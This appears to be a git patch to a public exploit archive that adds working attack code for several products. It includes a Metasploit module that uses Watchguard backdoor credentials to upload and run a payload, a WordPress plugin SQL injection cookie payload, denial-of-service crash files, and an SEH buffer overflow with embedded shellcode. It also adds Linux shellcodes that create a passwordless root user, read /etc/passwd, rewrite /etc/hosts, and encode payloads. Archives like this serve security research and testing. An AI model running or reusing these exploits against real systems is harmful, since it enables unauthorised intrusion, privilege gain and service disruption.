From c1b7aa12fcca73aebc110ed32200f85183336889 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 15 Sep 2018 05:01:52 +0000 Subject: [PATCH] DB: 2018-09-15 10 changes to exploits/shellcodes CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC) InfraRecorder 0.53 - '.txt' Denial of Service (PoC) Faleemi Plus 1.0.2 - Denial of Service (PoC) Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH) Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit) Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes) Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes) Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes) Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes) --- exploits/linux/webapps/45409.rb | 142 +++++++++++++++++++++++++++ exploits/php/webapps/45411.txt | 48 +++++++++ exploits/windows_x86-64/dos/45410.py | 27 +++++ exploits/windows_x86-64/dos/45414.py | 25 +++++ exploits/windows_x86/dos/45413.py | 26 +++++ exploits/windows_x86/local/45412.py | 51 ++++++++++ files_exploits.csv | 6 ++ files_shellcodes.csv | 4 + shellcodes/linux_x86/45415.c | 80 +++++++++++++++ shellcodes/linux_x86/45416.c | 64 ++++++++++++ shellcodes/linux_x86/45417.c | 66 +++++++++++++ shellcodes/linux_x86/45418.c | 127 ++++++++++++++++++++++++ 12 files changed, 666 insertions(+) create mode 100755 exploits/linux/webapps/45409.rb create mode 100644 exploits/php/webapps/45411.txt create mode 100755 exploits/windows_x86-64/dos/45410.py create mode 100755 exploits/windows_x86-64/dos/45414.py create mode 100755 exploits/windows_x86/dos/45413.py create mode 100755 exploits/windows_x86/local/45412.py create mode 100644 shellcodes/linux_x86/45415.c create mode 100644 shellcodes/linux_x86/45416.c create mode 100644 shellcodes/linux_x86/45417.c create mode 100644 shellcodes/linux_x86/45418.c diff --git a/exploits/linux/webapps/45409.rb b/exploits/linux/webapps/45409.rb new file mode 100755 index 000000000..2a0846feb --- /dev/null +++ b/exploits/linux/webapps/45409.rb @@ -0,0 +1,142 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Watchguard AP Backdoor Shell', + 'Description' => 'Watchguard AP\'s have a backdoor account with known credentials. This can be used to + gain a valid web session on the HTTP administration interface. The administrator + can then upload a shell directly to the web root to execute it. + This module can also be used if you have legitimate access credentials to the device.', + 'References' => + [ + ['CVE', 'CVE-2018-10575'], + ['CVE', 'CVE-2018-10576'], + ['CVE', 'CVE-2018-10577'], + ['URL', 'http://seclists.org/fulldisclosure/2018/May/12'], + ['URL', 'https://watchguardsupport.secure.force.com/publicKB?type=KBSecurityIssues&SFDCID=kA62A0000000LIy'], + ], + 'Author' => 'Stephen Shkardoon ', # ss23 / @ss2342 + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'Targets' => [ [ 'Automatic', { } ] ], + 'DefaultTarget' => 0, + 'Arch' => ARCH_MIPSBE, + )) + + register_options( + [ + Opt::RPORT(443), + #Opt::SSL(true), + OptString.new('WG_USER', [ true, 'The username to authenticate as', 'admin']), + OptString.new('WG_PASS', [ true, 'The password for the specified username', '1234']), + ]) + end + + def exploit + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => '/cgi-bin/luci/', + 'headers' => { + 'AUTH_USER' => datastore['WG_USER'], + 'AUTH_PASS' => datastore['WG_PASS'], + }, + }) + + if res.nil? || res.get_cookies.empty? + fail_with(Failure::NotFound, 'Unable to obtain a valid session with provided credentials') + end + + # We have a valid session, so we should pull out the access credentials and find the serial number + sysauth = res.get_cookies.scan(/(sysauth=\w+);*/).flatten[0] + stok = res.redirection.to_s.scan(/;(stok=\w+)/).flatten[0] + + vprint_status("Got sysauth #{sysauth}") + vprint_status("Got stok #{stok}") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "/cgi-bin/luci/;#{stok}/html/Status", + 'headers' => { + 'AUTH_USER' => datastore['WG_USER'], + 'AUTH_PASS' => datastore['WG_PASS'], + }, + 'cookie' => sysauth, + }) + + if res.nil? || res.code != 200 + fail_with(Failure::NotFound, 'Unable to request serial') + end + + # Pull out the serial and store it for later + # var device_serial = "20AP0XXXXXXXX"; + if res.body.match(/device_serial = "(\w+)";/) + serial = $1 + else + fail_with(Failure::NotFound, 'Unable to find serial in response') + end + + vprint_status("Got serial #{serial}") + + # Finally, upload our payloads + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/cgi-bin/luci/;#{stok}/wgupload", + 'headers' => { + 'AUTH_USER' => datastore['WG_USER'], + 'AUTH_PASS' => datastore['WG_PASS'], + }, + 'cookie' => "#{sysauth}; serial=#{serial}; filename=/tmp/payload; md5sum=fail", + 'data' => payload.encoded_exe, + }) + + if res.nil? || res.code != 205 + fail_with(Failure::NotFound, "Could not upload file 1: #{res.body}") + end + + # Upload the lua script that executes our payload + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "/cgi-bin/luci/;#{stok}/wgupload", + 'headers' => { + 'AUTH_USER' => datastore['WG_USER'], + 'AUTH_PASS' => datastore['WG_PASS'], + }, + 'cookie' => "#{sysauth}; serial=#{serial}; filename=/www/cgi-bin/payload.luci; md5sum=fail", + 'data' => "#!/usr/bin/lua +os.execute('/bin/chmod +x /tmp/payload'); +os.execute('/tmp/payload');" + }) + + if res.nil? || res.code != 205 + fail_with(Failure::NotFound, "Could not upload file 1: #{res.body}") + end + + # Remove the trigger script once we've got a shell + register_file_for_cleanup("/www/cgi-bin/payload.luci") + + vprint_status("Uploaded lua script") + + # Trigger our payload + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "/cgi-bin/payload.luci", + }) + + vprint_status("Requested lua payload") + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + vprint_error("Failed to connect to the web server") + return nil + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/45411.txt b/exploits/php/webapps/45411.txt new file mode 100644 index 000000000..3179b3d3c --- /dev/null +++ b/exploits/php/webapps/45411.txt @@ -0,0 +1,48 @@ +# Exploit Title: Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection +# Date: 2018-09-09 +# Exploit Author: Ceylan Bozogullarindan +# Vendor Homepage: http://modalsurvey.pantherius.com/ +# Software Link: https://downloads.wordpress.org/plugin/wp-survey-and-poll.zip +# Version: 1.5.7.3 +# Tested on: Windows 10 +# CVE: N\A + +# Description +# The vulnerability allows an attacker to inject sql commands using a value of a cookie parameter. + +# PoC +# Step 1. When you visit a page which has a poll or survey, a question will be appeared for answering. +# Answer that question. +# Step 2. When you answer the question, wp_sap will be assigned to a value. Open a cookie manager, +# and change it with the payload showed below; + +["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] + +# It is important that the "OR" statement must be 1=2. Because, application is reflecting the first result +# of the query. When you make it 1=1, you should see a question from firt record. +# Therefore OR statement must be returned False. + +# Step 3. Reload the page. Open the source code of the page. Search "sss_params". +# You will see the version of DB in value of sss_params parameter. + +# The Request + +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-GB,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"] +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + +# The result from source code of the page + + + +DB version: "10.1.36-MariaDB-1~trusty".... \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45410.py b/exploits/windows_x86-64/dos/45410.py new file mode 100755 index 000000000..cbf71224d --- /dev/null +++ b/exploits/windows_x86-64/dos/45410.py @@ -0,0 +1,27 @@ +# Exploit Title: CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC) +# Discovery by: Alan Baeza +# Discovery Date: 2018-09-13 +# Vendor Homepage: https://cdburnerxp.se/ +# Software Link: https://cdburnerxp.se/downloadsetup.exe +# Tested Version: 4.5.8.6795 +# Tested on OS : Windows 10 Pro x64 es + +#!/usr/bin/env python +#-*-coding: utf-8-*- +# Steps to Produce the DoS: +# 1.- Run python code : python dos.py +# 2.- Open generate.txt and copy content to clipboard +# 3.- Open CdBurnerXP +# 4.- Select option "Copy or grab disc" +# 5.- Select checkbox target "Hard disk" +# 6.- Paste ClipBoard on "File name" +# 7.- Clic Copy disc +# 8.- DoS + +import socket, os, sys + +buffer = "\x41" * 260 + +f = open ("generate.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45414.py b/exploits/windows_x86-64/dos/45414.py new file mode 100755 index 000000000..b3ba63c9a --- /dev/null +++ b/exploits/windows_x86-64/dos/45414.py @@ -0,0 +1,25 @@ +# Exploit Title: Faleemi Plus 1.0.2 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-09-14 +# Software Link: http://support.faleemi.com/fsc776/Faleemi_Plus_v1.0.2.exe +# Tested Version: 1.0.2 +# Tested on OS: Windows 10 +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt" just copy the text inside "exploit.txt" +# and start the program. Now click "Add Camera" and in the new +# window paste the content of "exploit.txt" into the following fields: +# "Camera name" & "DID number". Click "Add" and you will see a crash. + +#!/usr/bin/python + +buffer = "A" * 2000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/dos/45413.py b/exploits/windows_x86/dos/45413.py new file mode 100755 index 000000000..1b60a28cf --- /dev/null +++ b/exploits/windows_x86/dos/45413.py @@ -0,0 +1,26 @@ +# Exploit Title: InfraRecorder 0.53 - '.txt' Denial of Service (PoC) +# Date: 2018-09-14 +# Exploit Author: Gionathan "John" Reale +# Version: version 0.53 +# Download: http://sourceforge.net/projects/infrarecorder/files/InfraRecorder/0.53/ir053.exe/download +# Tested on: Windows 7 32bit + +# Steps to Reproduce: +# Run the python exploit script, it will create a new file with the name "exploit.txt". +# Start the program and click "Edit" > "Import... " +# Find the file "exploit.txt" and click "Open" +# You will see a crash! + +#!/usr/bin/python + +buffer = "A" * 6000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86/local/45412.py b/exploits/windows_x86/local/45412.py new file mode 100755 index 000000000..a4b13c538 --- /dev/null +++ b/exploits/windows_x86/local/45412.py @@ -0,0 +1,51 @@ +# Exploit Title: Free MP3 CD Ripper 2.6 - '.wma' Buffer Overflow (SEH) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-09-13 +# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper +# Tested on OS: Windows 7 32bit +# Tested Version: 2.6 +# Steps to Reproduce: +# Run the python exploit script, it will create a new file with the name "exploit.wma". +# Start the program and click on "Convert". +# Find the file "exploit.wma" and click "Open" +# You will see a calculator poped up. + +#!/usr/bin/python + +buffer = "A" * 4116 + +NSEH = "\xeb\x06\x90\x90" + +SEH = "\x21\x21\xe4\x66" +nops = "\x90" * 8 +#badchar \x00\x0a\x0d\x2f +#msfvenom calculator +buf = "" +buf += "\xba\x9a\x98\xaf\x7e\xdd\xc2\xd9\x74\x24\xf4\x5f\x29" +buf += "\xc9\xb1\x31\x83\xc7\x04\x31\x57\x0f\x03\x57\x95\x7a" +buf += "\x5a\x82\x41\xf8\xa5\x7b\x91\x9d\x2c\x9e\xa0\x9d\x4b" +buf += "\xea\x92\x2d\x1f\xbe\x1e\xc5\x4d\x2b\x95\xab\x59\x5c" +buf += "\x1e\x01\xbc\x53\x9f\x3a\xfc\xf2\x23\x41\xd1\xd4\x1a" +buf += "\x8a\x24\x14\x5b\xf7\xc5\x44\x34\x73\x7b\x79\x31\xc9" +buf += "\x40\xf2\x09\xdf\xc0\xe7\xd9\xde\xe1\xb9\x52\xb9\x21" +buf += "\x3b\xb7\xb1\x6b\x23\xd4\xfc\x22\xd8\x2e\x8a\xb4\x08" +buf += "\x7f\x73\x1a\x75\xb0\x86\x62\xb1\x76\x79\x11\xcb\x85" +buf += "\x04\x22\x08\xf4\xd2\xa7\x8b\x5e\x90\x10\x70\x5f\x75" +buf += "\xc6\xf3\x53\x32\x8c\x5c\x77\xc5\x41\xd7\x83\x4e\x64" +buf += "\x38\x02\x14\x43\x9c\x4f\xce\xea\x85\x35\xa1\x13\xd5" +buf += "\x96\x1e\xb6\x9d\x3a\x4a\xcb\xff\x50\x8d\x59\x7a\x16" +buf += "\x8d\x61\x85\x06\xe6\x50\x0e\xc9\x71\x6d\xc5\xae\x8e" +buf += "\x27\x44\x86\x06\xee\x1c\x9b\x4a\x11\xcb\xdf\x72\x92" +buf += "\xfe\x9f\x80\x8a\x8a\x9a\xcd\x0c\x66\xd6\x5e\xf9\x88" +buf += "\x45\x5e\x28\xeb\x08\xcc\xb0\xc2\xaf\x74\x52\x1b" +pad = "B" * (4440 - len(NSEH) - len(SEH) - len(buffer) - len(nops) - len(buf) ) + +payload = buffer + NSEH + SEH + nops + buf + pad +try: + f=open("exploit.wma","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 55f959f94..c2e936a22 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6109,6 +6109,9 @@ id,file,description,date,author,type,platform,port 45398,exploits/windows/dos/45398.py,"MediaTek Wirless Utility rt2870 - Denial of Service (PoC)",2018-09-13,"Lawrence Amer",dos,windows, 45404,exploits/windows_x86-64/dos/45404.py,"TeamViewer App 13.0.100.0 - Denial of Service (PoC)",2018-09-13,"Ali Alipour",dos,windows_x86-64, 45405,exploits/linux/dos/45405.txt,"Linux 4.18 - Arbitrary Kernel Read into dmesg via Missing Address Check in segfault Handler",2018-09-13,"Google Security Research",dos,linux, +45410,exploits/windows_x86-64/dos/45410.py,"CdBurnerXP 4.5.8.6795 - 'File Name' Denial of Service (PoC)",2018-09-14,"Alan Joaquín Baeza Meza",dos,windows_x86-64, +45413,exploits/windows_x86/dos/45413.py,"InfraRecorder 0.53 - '.txt' Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86, +45414,exploits/windows_x86-64/dos/45414.py,"Faleemi Plus 1.0.2 - Denial of Service (PoC)",2018-09-14,"Gionathan Reale",dos,windows_x86-64, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9969,6 +9972,7 @@ id,file,description,date,author,type,platform,port 45403,exploits/windows_x86/local/45403.py,"Free MP3 CD Ripper 2.6 - '.mp3' Buffer Overflow (SEH)",2018-09-13,"Gionathan Reale",local,windows_x86, 45406,exploits/windows/local/45406.py,"Socusoft Photo to Video Converter 8.07 - 'Registration Name' Buffer Overflow",2018-09-13,ZwX,local,windows, 45407,exploits/linux/local/45407.txt,"Chrome OS 10820.0.0 dev-channel - app->VM via garcon TCP Command Socket",2018-09-13,"Google Security Research",local,linux, +45412,exploits/windows_x86/local/45412.py,"Free MP3 CD Ripper 2.6 - '.wma' Local Buffer Overflow (SEH)",2018-09-14,"Gionathan Reale",local,windows_x86, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39975,3 +39979,5 @@ id,file,description,date,author,type,platform,port 45394,exploits/hardware/webapps/45394.py,"LG Smart IP Camera 1508190 - Backup File Download",2018-09-12,"Ege Balci",webapps,hardware, 45396,exploits/windows/webapps/45396.txt,"Apache Portals Pluto 3.0.0 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows, 45400,exploits/windows/webapps/45400.txt,"Apache Syncope 2.0.7 - Remote Code Execution",2018-09-13,"Che-Chun Kuo",webapps,windows, +45409,exploits/linux/webapps/45409.rb,"Watchguard AP100 AP102 AP200 1.2.9.15 - Remote Code Execution (Metasploit)",2018-09-14,"Stephen Shkardoon",webapps,linux,443 +45411,exploits/php/webapps/45411.txt,"Wordpress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection",2018-09-14,"Ceylan BOZOĞULLARINDAN",webapps,php,80 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index c3b877e02..dd333117d 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -908,3 +908,7 @@ id,file,description,date,author,type,platform 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64 45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm 45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm +45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 +45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 +45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 +45418,shellcodes/linux_x86/45418.c,"Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 diff --git a/shellcodes/linux_x86/45415.c b/shellcodes/linux_x86/45415.c new file mode 100644 index 000000000..8938d2741 --- /dev/null +++ b/shellcodes/linux_x86/45415.c @@ -0,0 +1,80 @@ +/* +# Shellcode Title: Linux/x86 - Add User(r00t/blank) Polymorphic Shellcode (103 bytes) +# Date: 2018-09-13 +# Author: Ray Doyle (@doylersec) +# Homepage: https://www.doyler.net +# Tested on: Linux/x86 +# gcc -o poly_adduser_shellcode -z execstack -fno-stack-protector poly_adduser_shellcode.c +*/ + +/**************************************************** +Disassembly of section .text: + +08048060 <_start>: + 8048060: 90 nop + 8048061: 58 pop eax + 8048062: 29 db sub ebx,ebx + 8048064: 31 c9 xor ecx,ecx + 8048066: 66 b9 01 04 mov cx,0x401 + 804806a: 51 push ecx + 804806b: 5f pop edi + 804806c: 53 push ebx + 804806d: 6a 06 push 0x6 + 804806f: 58 pop eax + 8048070: 48 dec eax + 8048071: 68 2f 2f 70 61 push 0x61702f2f + 8048076: 68 37 13 37 13 push 0x13371337 + 804807b: 68 73 73 77 64 push 0x64777373 + 8048080: 68 2f 65 74 63 push 0x6374652f + 8048085: 5a pop edx + 8048086: 5e pop esi + 8048087: 5f pop edi + 8048088: 5f pop edi + 8048089: 56 push esi + 804808a: 57 push edi + 804808b: 52 push edx + 804808c: 89 e3 mov ebx,esp + 804808e: cd 80 int 0x80 + 8048090: 50 push eax + 8048091: 5a pop edx + 8048092: 92 xchg edx,eax + 8048093: 89 c3 mov ebx,eax + 8048095: 6a 05 push 0x5 + 8048097: 31 d2 xor edx,edx + 8048099: 87 db xchg ebx,ebx + 804809b: 6a 0c push 0xc + 804809d: 58 pop eax + 804809e: 5a pop edx + 804809f: 92 xchg edx,eax + 80480a0: 52 push edx + 80480a1: 90 nop + 80480a2: 68 30 3a 3a 3a push 0x3a3a3a30 + 80480a7: 56 push esi + 80480a8: 5e pop esi + 80480a9: 68 3a 3a 30 3a push 0x3a303a3a + 80480ae: 68 72 30 30 74 push 0x74303072 + 80480b3: 48 dec eax + 80480b4: 89 e1 mov ecx,esp + 80480b6: 6a 01 push 0x1 + 80480b8: cd 80 int 0x80 + 80480ba: 6a 04 push 0x4 + 80480bc: 58 pop eax + 80480bd: 83 c0 02 add eax,0x2 + 80480c0: cd 80 int 0x80 + 80480c2: 31 c0 xor eax,eax + 80480c4: 40 inc eax + 80480c5: cd 80 int 0x80 +****************************************************/ + +#include +#include + +unsigned char code[] = \ +"\x90\x58\x29\xdb\x31\xc9\x66\xb9\x01\x04\x51\x5f\x53\x6a\x06\x58\x48\x68\x2f\x2f\x70\x61\x68\x37\x13\x37\x13\x68\x73\x73\x77\x64\x68\x2f\x65\x74\x63\x5a\x5e\x5f\x5f\x56\x57\x52\x89\xe3\xcd\x80\x50\x5a\x92\x89\xc3\x6a\x05\x31\xd2\x87\xdb\x6a\x0c\x58\x5a\x92\x52\x90\x68\x30\x3a\x3a\x3a\x56\x5e\x68\x3a\x3a\x30\x3a\x68\x72\x30\x30\x74\x48\x89\xe1\x6a\x01\xcd\x80\x6a\x04\x58\x83\xc0\x02\xcd\x80\x31\xc0\x40\xcd\x80"; + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86/45416.c b/shellcodes/linux_x86/45416.c new file mode 100644 index 000000000..0047d6fa6 --- /dev/null +++ b/shellcodes/linux_x86/45416.c @@ -0,0 +1,64 @@ +/* +# Shellcode Title: Linux/x86 - Read File (/etc/passwd) MSF Optimized Shellcode (61 bytes) +# Date: 2018-09-13 +# Author: Ray Doyle (@doylersec) +# Homepage: https://www.doyler.net +# Tested on: Linux/x86 +# gcc -o readfile_shellcode -z execstack -fno-stack-protector readfile_shellcode.c +*/ + +/**************************************************** +Disassembly of section .text: + +08048060 <_start>: + 8048060: eb 2b jmp 804808d + +08048062 : + 8048062: 31 c0 xor eax,eax + 8048064: b0 05 mov al,0x5 + 8048066: 5b pop ebx + 8048067: 31 c9 xor ecx,ecx + 8048069: cd 80 int 0x80 + 804806b: 89 c3 mov ebx,eax + 804806d: b0 03 mov al,0x3 + 804806f: 89 e7 mov edi,esp + 8048071: 89 f9 mov ecx,edi + 8048073: 31 d2 xor edx,edx + 8048075: b6 10 mov dh,0x10 + 8048077: cd 80 int 0x80 + 8048079: 89 c2 mov edx,eax + 804807b: 31 c0 xor eax,eax + 804807d: b0 04 mov al,0x4 + 804807f: 31 db xor ebx,ebx + 8048081: b3 01 mov bl,0x1 + 8048083: cd 80 int 0x80 + 8048085: 31 c0 xor eax,eax + 8048087: b0 01 mov al,0x1 + 8048089: 31 db xor ebx,ebx + 804808b: cd 80 int 0x80 + +0804808d : + 804808d: e8 d0 ff ff ff call 8048062 + +08048092 : + 8048092: 2f das + 8048093: 65 gs + 8048094: 74 63 je 80480f9 + 8048096: 2f das + 8048097: 70 61 jo 80480fa + 8048099: 73 73 jae 804810e + 804809b: 77 64 ja 8048101 +****************************************************/ + +#include +#include + +unsigned char code[] = \ +"\xeb\x2b\x31\xc0\xb0\x05\x5b\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9\x31\xd2\xb6\x10\xcd\x80\x89\xc2\x31\xc0\xb0\x04\x31\xdb\xb3\x01\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xd0\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"; + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86/45417.c b/shellcodes/linux_x86/45417.c new file mode 100644 index 000000000..283b842fd --- /dev/null +++ b/shellcodes/linux_x86/45417.c @@ -0,0 +1,66 @@ +/* + # Title: Linux/86 - File Modification(/etc/hosts) Polymorphic Shellcode (99 bytes) + # Date: 2018-09-13 + # Author: Ray Doyle (@doylersec) + # Tested on: Linux/x86 + # gcc -o poly_hosts_shellcode -z execstack -fno-stack-protector poly_hosts_shellcode.c +*/ + +/**************************************************** +Disassembly of section .text: + +08048060 <_start>: + 8048060: 29 c9 sub ecx,ecx + 8048062: 51 push ecx + +08048063 : + 8048063: 6a 05 push 0x5 + 8048065: 58 pop eax + 8048066: 68 6f 73 74 73 push 0x7374736f + 804806b: 68 74 63 2f 68 push 0x682f6374 + 8048070: 68 2f 2f 2f 65 push 0x652f2f2f + 8048075: 54 push esp + 8048076: 5b pop ebx + 8048077: 51 push ecx + 8048078: 41 inc ecx + 8048079: b5 04 mov ch,0x4 + 804807b: cd 80 int 0x80 + 804807d: 93 xchg ebx,eax + 804807e: 6a 04 push 0x4 + 8048080: 58 pop eax + +08048081 : + 8048081: 68 2e 63 6f 6d push 0x6d6f632e + 8048086: 68 6f 67 6c 65 push 0x656c676f + 804808b: 68 31 20 67 6f push 0x6f672031 + 8048090: 68 31 2e 31 2e push 0x2e312e31 + 8048095: 68 31 32 37 2e push 0x2e373231 + 804809a: 54 push esp + 804809b: 59 pop ecx + 804809c: 6a 14 push 0x14 + 804809e: 5a pop edx + 804809f: cd 80 int 0x80 + +080480a1 : + 80480a1: 92 xchg edx,eax + 80480a2: b0 06 mov al,0x6 + 80480a4: cd 80 int 0x80 + +080480a6 : + 80480a6: 31 c0 xor eax,eax + 80480a8: 40 inc eax + 80480a9: cd 80 int 0x80 +****************************************************/ + +#include +#include + +unsigned char code[] = \ +"\x29\xc9\x51\x6a\x05\x58\x68\x6f\x73\x74\x73\x68\x74\x63\x2f\x68\x68\x2f\x2f\x2f\x65\x54\x5b\x51\x41\xb5\x04\xcd\x80\x93\x6a\x04\x58\x68\x2e\x63\x6f\x6d\x68\x6f\x67\x6c\x65\x68\x31\x20\x67\x6f\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x54\x59\x6a\x14\x5a\xcd\x80\x92\xb0\x06\xcd\x80\x31\xc0\x40\xcd\x80"; + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); + int (*ret)() = (int(*)())code; + ret(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86/45418.c b/shellcodes/linux_x86/45418.c new file mode 100644 index 000000000..694d60a49 --- /dev/null +++ b/shellcodes/linux_x86/45418.c @@ -0,0 +1,127 @@ +/* +# Title: Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes) +# Date: 2018-09-13 +# Author: Ray Doyle (@doylersec) +# Homepage: https://www.doyler.net +# Tested on: Linux/x86 +# gcc -o xor_encoded_shellcode -z execstack -fno-stack-protector xor_encoded_shellcode.c +*/ + +/**************************************************** +Disassembly of section .text: + +08048060 <_start>: + 8048060: eb 2f jmp 8048091 + +08048062 : + 8048062: 5f pop edi + 8048063: 57 push edi + 8048064: 5e pop esi + +08048065 : + 8048065: 8a 07 mov al,BYTE PTR [edi] + 8048067: 6a 90 push 0xffffff90 + 8048069: 5b pop ebx + 804806a: 3c aa cmp al,0xaa + 804806c: 74 0a je 8048078 + 804806e: 30 d8 xor al,bl + +08048070 : + 8048070: 30 07 xor BYTE PTR [edi],al + 8048072: 47 inc edi + 8048073: 30 07 xor BYTE PTR [edi],al + 8048075: 47 inc edi + 8048076: eb ed jmp 8048065 + +08048078 : + 8048078: 8d 3e lea edi,[esi] + 804807a: 31 c0 xor eax,eax + 804807c: 31 db xor ebx,ebx + +0804807e : + 804807e: 8a 1c 06 mov bl,BYTE PTR [esi+eax*1] + 8048081: 80 f3 90 xor bl,0x90 + 8048084: 75 10 jne 8048096 + 8048086: 8a 5c 06 01 mov bl,BYTE PTR [esi+eax*1+0x1] + 804808a: 88 1f mov BYTE PTR [edi],bl + 804808c: 47 inc edi + 804808d: 04 02 add al,0x2 + 804808f: eb ed jmp 804807e + +08048091 : + 8048091: e8 cc ff ff ff call 8048062 + +08048096 : + 8048096: b7 cc mov bh,0xcc + 8048098: 3d ba 0a ab f3 cmp eax,0xf3ab0aba + 804809d: a3 9b bb 01 95 mov ds:0x9501bb9b,eax + 80480a2: 75 d4 jne 8048078 + 80480a4: bc f7 fa d9 1c mov esp,0x1cd9faf7 + 80480a9: 8d (bad) + 80480aa: d5 1c aad 0x1c + 80480ac: f7 56 73 not DWORD PTR [esi+0x73] + 80480af: 31 ef xor edi,ebp + 80480b1: cd a9 int 0xa9 + 80480b3: 34 12 xor al,0x12 + 80480b5: 4f dec edi + 80480b6: 50 push eax + 80480b7: 40 inc eax + 80480b8: 71 d0 jno 804808a + 80480ba: 94 xchg esp,eax + 80480bb: c4 (bad) + 80480bc: f7 d7 not edi + 80480be: 